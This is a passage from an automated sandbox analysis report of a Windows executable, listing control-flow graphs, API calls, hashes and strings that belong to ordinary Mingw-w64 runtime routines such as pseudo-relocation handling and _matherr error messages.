                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                    • String ID:
                                    • API String ID: 4278921479-0
                                    • Opcode ID: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
                                    • Instruction ID: cf336b0ec7d2cb6baae35a739632777ca23f94a65b3f666190a75c6fcbb7d788
                                    • Opcode Fuzzy Hash: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
                                    • Instruction Fuzzy Hash: B5210FB5202F45E9EB009B61F98438A33B4BB08B88F40452ADF8E27775EF38C519C708

                                    Control-flow Graph

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                                    • GetCurrentProcessId.KERNEL32 ref: 004019E0
                                    • GetCurrentThreadId.KERNEL32 ref: 004019E8
                                    • GetTickCount.KERNEL32 ref: 004019F0
                                    • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                    • String ID:
                                    • API String ID: 1445889803-0
                                    • Opcode ID: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
                                    • Instruction ID: 088ae4e322ac71afa1741572681cd55a149c1471ea95f8004f9c9491386c013f
                                    • Opcode Fuzzy Hash: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
                                    • Instruction Fuzzy Hash: AA1170A6756B1092FB209B25F90431973A0B788BF4F081A759F9D53BB4DA3CC986C708
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                    • Instruction ID: 040a81dcf2f050336bda00ad6163e1b97f4a0e7d9bd373c2026e90d71216a3c6
                                    • Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                    • Instruction Fuzzy Hash: 4DD0C7D7F5DFD096D32281A40CB60593F91B4F291031E80AF4E40A33D3741C1C055315
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
                                    • Instruction ID: 82f505fb4451acb9e8d1e12f81e5a21f5fcc3540fe401e05c5c992db50528185
                                    • Opcode Fuzzy Hash: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
                                    • Instruction Fuzzy Hash: 62A0029244DD0290E3101B40D9413A07279D306240F0424A6421461072853D8520414C

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 120 401d50-401ddc call 402ec0 call 402e48 call 402ec0 call 402e10 call 402e70 132 401de2-401def 120->132 133 401f68-401f6a 120->133 134 401df0-401df6 132->134 135 401df8-401e06 134->135 136 401e0c-401e15 134->136 135->136 137 401e97-401e9a 135->137 136->134 138 401e17-401e25 call 402b20 136->138 139 401ec8-401ef3 137->139 140 401e9c-401e9f 137->140 149 401fa2-401fac call 401d50 138->149 150 401e2b-401e72 call 402c50 VirtualQuery 138->150 142 401ef5-401ef8 139->142 143 401eb9-401ec3 139->143 144 401f70-401f81 140->144 145 401ea5-401ea7 140->145 147 401efa-401f09 142->147 144->143 145->143 148 401ea9-401eb3 145->148 147->147 151 401f0b-401f15 147->151 148->143 152 401f90-401f9d 148->152 155 401fb1-401ff0 call 401d50 149->155 150->155 158 401e78-401e82 150->158 152->143 152->155 165 401ff2-402002 155->165 166 402008-40205f call 402bb0 call 402dd0 155->166 159 401e90 158->159 160 401e84-401e8a 158->160 159->137 160->159 162 401f20-401f4a VirtualProtect 160->162 162->159 164 401f50-401f64 GetLastError call 401d50 162->164 164->133 166->165 173 402061-402067 166->173 174 4021b8-4021ba 173->174 175 40206d-40206f 173->175 176 402240-402243 174->176 177 4021c0-4021c8 174->177 175->176 178 402075 175->178 176->165 181 402249-402264 176->181 179 402078-40207a 177->179 180 4021ce-4021d1 177->180 178->179 179->176 182 402080-402086 179->182 184 4021e0-4021e4 180->184 183 402268-40228a call 401dc0 181->183 185 4022a8-4022ce call 401d50 182->185 186 40208c-4020a8 182->186 194 40228c 183->194 189 402291-4022a3 call 401d50 184->189 190 4021ea-402208 call 401dc0 184->190 202 4022d0-4022fb 185->202 203 4022fc-402300 185->203 192 4020e9-402100 186->192 193 4020aa 186->193 189->185 195 402210-40223a call 401dc0 190->195 192->195 196 402106 192->196 193->165 194->189 195->176 196->184 200 40210c-402110 196->200 205 4020b0-4020e7 call 401dc0 200->205 206 402112-402116 200->206 202->203 205->192 213 402160-402168 205->213 206->189 208 40211c-402154 call 401dc0 206->208 208->192 215 402156 208->215 213->165 216 40216e-402177 213->216 215->213 217 402180-402190 216->217 218 4021a0-4021ad 217->218 219 402192-40219d VirtualProtect 217->219 218->217 220 4021af 218->220 219->218 220->165
                                    APIs
                                    Strings
                                    • Mingw-w64 runtime failure:, xrefs: 00401D88
                                    • Address %p has no image-section, xrefs: 00401DC0
                                    • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                    • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: QueryVirtual
                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                    • API String ID: 1804819252-1534286854
                                    • Opcode ID: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
                                    • Instruction ID: 10d76aa513752d408286ffc26ec959f6f169e193d9772deefbdc98a11bb0eab9
                                    • Opcode Fuzzy Hash: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
                                    • Instruction Fuzzy Hash: 2C51DFB2701B4086DB109F26E94475E77A1F799BA4F58423AEF98233E1EA3CC485C748

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 225 4025e0-4025fc 226 4026d0-4026d4 225->226 227 402602-402607 225->227 226->227 230 4026da 226->230 228 4026b7-4026c1 227->228 229 40260d-402612 227->229 231 4026e0-4026e8 228->231 232 4026c3-4026ca 228->232 233 402614-40261c 229->233 234 402668-40266d 229->234 235 402658 230->235 232->226 233->235 236 40261e-402629 233->236 238 402673 234->238 239 402718-402728 signal 234->239 237 40265d-402663 235->237 236->235 242 4026b0-4026b5 238->242 243 402675-40267a 238->243 240 402779-402788 signal 239->240 241 40272a-40272d 239->241 241->228 244 40272f-40273b 241->244 242->228 242->235 243->235 245 40267c-402681 243->245 244->237 245->228 246 402683-402693 signal 245->246 248 402740-402752 signal 246->248 249 402699-40269c 246->249 248->237 249->228 250 40269e-4026aa 249->250 250->237
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: signal
                                    • String ID: CCG
                                    • API String ID: 1946981877-1584390748
                                    • Opcode ID: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                                    • Instruction ID: 8a37928041284c8a434aeccdd4db6f983c568c8f0cf3e4f2934023fa32f313ab
                                    • Opcode Fuzzy Hash: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                                    • Instruction Fuzzy Hash: C321A171B0154146EE296279865D33B10019B9A374F284E379A3DA73E0DEFECCC2830E

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 258 401fd0-401ff0 259 401ff2-402002 258->259 260 402008-40205f call 402bb0 call 402dd0 258->260 260->259 265 402061-402067 260->265 266 4021b8-4021ba 265->266 267 40206d-40206f 265->267 268 402240-402243 266->268 269 4021c0-4021c8 266->269 267->268 270 402075 267->270 268->259 273 402249-402264 268->273 271 402078-40207a 269->271 272 4021ce-4021d1 269->272 270->271 271->268 274 402080-402086 271->274 276 4021e0-4021e4 272->276 275 402268-40228a call 401dc0 273->275 277 4022a8-4022ce call 401d50 274->277 278 40208c-4020a8 274->278 286 40228c 275->286 281 402291-4022a3 call 401d50 276->281 282 4021ea-402208 call 401dc0 276->282 294 4022d0-4022fb 277->294 295 4022fc-402300 277->295 284 4020e9-402100 278->284 285 4020aa 278->285 281->277 287 402210-40223a call 401dc0 282->287 284->287 288 402106 284->288 285->259 286->281 287->268 288->276 292 40210c-402110 288->292 297 4020b0-4020e7 call 401dc0 292->297 298 402112-402116 292->298 294->295 297->284 305 402160-402168 297->305 298->281 300 40211c-402154 call 401dc0 298->300 300->284 307 402156 300->307 305->259 308 40216e-402177 305->308 307->305 309 402180-402190 308->309 310 4021a0-4021ad 309->310 311 402192-40219d VirtualProtect 309->311 310->309 312 4021af 310->312 311->310 312->259
                                    Strings
                                    • Unknown pseudo relocation bit size %d., xrefs: 00402294
                                    • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                    • API String ID: 0-395989641
                                    • Opcode ID: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
                                    • Instruction ID: 42e0c3400c77c9dd47adb4fdb8995eb2357067ceb312bbd9be83e7c2f840df7f
                                    • Opcode Fuzzy Hash: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
                                    • Instruction Fuzzy Hash: 6A712272B10B9486DF10CF61DA0875A7761FB58BA8F58862ADF08377E8DB7DC540CA08

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 313 401dc0-401ddc 314 401de2-401def 313->314 315 401f68-401f6a 313->315 316 401df0-401df6 314->316 317 401df8-401e06 316->317 318 401e0c-401e15 316->318 317->318 319 401e97-401e9a 317->319 318->316 320 401e17-401e25 call 402b20 318->320 321 401ec8-401ef3 319->321 322 401e9c-401e9f 319->322 331 401fa2-401fac call 401d50 320->331 332 401e2b-401e72 call 402c50 VirtualQuery 320->332 324 401ef5-401ef8 321->324 325 401eb9-401ec3 321->325 326 401f70-401f81 322->326 327 401ea5-401ea7 322->327 329 401efa-401f09 324->329 326->325 327->325 330 401ea9-401eb3 327->330 329->329 333 401f0b-401f15 329->333 330->325 334 401f90-401f9d 330->334 337 401fb1-401ff0 call 401d50 331->337 332->337 340 401e78-401e82 332->340 334->325 334->337 347 401ff2-402002 337->347 348 402008-40205f call 402bb0 call 402dd0 337->348 341 401e90 340->341 342 401e84-401e8a 340->342 341->319 342->341 344 401f20-401f4a VirtualProtect 342->344 344->341 346 401f50-401f64 GetLastError call 401d50 344->346 346->315 348->347 355 402061-402067 348->355 356 4021b8-4021ba 355->356 357 40206d-40206f 355->357 358 402240-402243 356->358 359 4021c0-4021c8 356->359 357->358 360 402075 357->360 358->347 363 402249-402264 358->363 361 402078-40207a 359->361 362 4021ce-4021d1 359->362 360->361 361->358 364 402080-402086 361->364 366 4021e0-4021e4 362->366 365 402268-40228a call 401dc0 363->365 367 4022a8-4022ce call 401d50 364->367 368 40208c-4020a8 364->368 376 40228c 365->376 371 402291-4022a3 call 401d50 366->371 372 4021ea-402208 call 401dc0 366->372 384 4022d0-4022fb 367->384 385 4022fc-402300 367->385 374 4020e9-402100 368->374 375 4020aa 368->375 371->367 377 402210-40223a call 401dc0 372->377 374->377 378 402106 374->378 375->347 376->371 377->358 378->366 382 40210c-402110 378->382 387 4020b0-4020e7 call 401dc0 382->387 388 402112-402116 382->388 384->385 387->374 395 402160-402168 387->395 388->371 390 40211c-402154 call 401dc0 388->390 390->374 397 402156 390->397 395->347 398 40216e-402177 395->398 397->395 399 402180-402190 398->399 400 4021a0-4021ad 399->400 401 402192-40219d VirtualProtect 399->401 400->399 402 4021af 400->402 401->400 402->347
                                    APIs
                                    Strings
                                    • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                                    • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: QueryVirtual
                                    • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                    • API String ID: 1804819252-157664173
                                    • Opcode ID: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
                                    • Instruction ID: 52aafb0f448170306d42bca5540912cc2139dda9d14def77d71a33c16101a6f6
                                    • Opcode Fuzzy Hash: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
                                    • Instruction Fuzzy Hash: 4B31E3B3702A4195EF118F12EA4175A3761BB95BA4F49413AEF4C273A1EF3CD486C788
                                    APIs
                                    Strings
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    • Unknown error, xrefs: 00401D2C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-3474627141
                                    • Opcode ID: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
                                    • Instruction ID: 8762e6e2ae6541d4c7c6524eaf70c560080aac858bcbb5099d5ba83032827fc6
                                    • Opcode Fuzzy Hash: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
                                    • Instruction Fuzzy Hash: 1E016163D18F88C2D6018F18E8003AB7331FB6E749F259316EB8C3A565DB79D592C704
                                    APIs
                                    Strings
                                    • Argument domain error (DOMAIN), xrefs: 00401CE0
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2713391170
                                    • Opcode ID: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
                                    • Instruction ID: 8c7bf1553abe8d1c1cf5b10b417118f64097995adaaa4f0d994d3f7e231e07fb
                                    • Opcode Fuzzy Hash: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
                                    • Instruction Fuzzy Hash: ECF06D62858E8882D2029F1CE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704
                                    APIs
                                    Strings
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    • Partial loss of significance (PLOSS), xrefs: 00401CF0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4283191376
                                    • Opcode ID: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
                                    • Instruction ID: 5cd091db9141fe0e6e89e9efff11c316d26cc63b3b889972c32c6c159b948a40
                                    • Opcode Fuzzy Hash: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
                                    • Instruction Fuzzy Hash: C4F06262858E8882D2029F1CE4003AB7331FB5E788F245316EF8D3A555DB28D5828704
                                    APIs
                                    Strings
                                    • Overflow range error (OVERFLOW), xrefs: 00401D00
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4064033741
                                    • Opcode ID: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
                                    • Instruction ID: c612fb770c622c5d72669c3638e63aa4b2f428d8e56e9d424d6433c91b575293
                                    • Opcode Fuzzy Hash: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
                                    • Instruction Fuzzy Hash: 6FF01D62958E8882D2029F1DE4003AB7331FB9EB99F68531AEF8D3A555DB29D5828704
                                    APIs
                                    Strings
                                    • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2187435201
                                    • Opcode ID: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
                                    • Instruction ID: abe9318e7ccd880ee09ac2f980ce11207d3172f5f88a25f0641f3127fee3ffee
                                    • Opcode Fuzzy Hash: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
                                    • Instruction Fuzzy Hash: 77F06D62858E8882D2029F1DE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704
                                    APIs
                                    Strings
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    • Total loss of significance (TLOSS), xrefs: 00401D20
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4273532761
                                    • Opcode ID: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
                                    • Instruction ID: 7a53e470b351231260d633d6082b1e766a8645853782131be27a1b39d9499402
                                    • Opcode Fuzzy Hash: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
                                    • Instruction Fuzzy Hash: 52F01262958E8882D2029F1DE4003AB7331FB9E799F245316EF8D3A555DB39D5828704
                                    APIs
                                    Strings
                                    • Argument singularity (SIGN), xrefs: 00401C78
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2468659920
                                    • Opcode ID: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
                                    • Instruction ID: b6e0ecebc6e2091bb6bcdfd9ecb9f8b620cfa756c99f7cd1274eda0ebaf44184
                                    • Opcode Fuzzy Hash: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
                                    • Instruction Fuzzy Hash: CBF03062954F8882D202DF2DE4003AB7331FB5EB9DF649316EF8D3A555DB29D5828704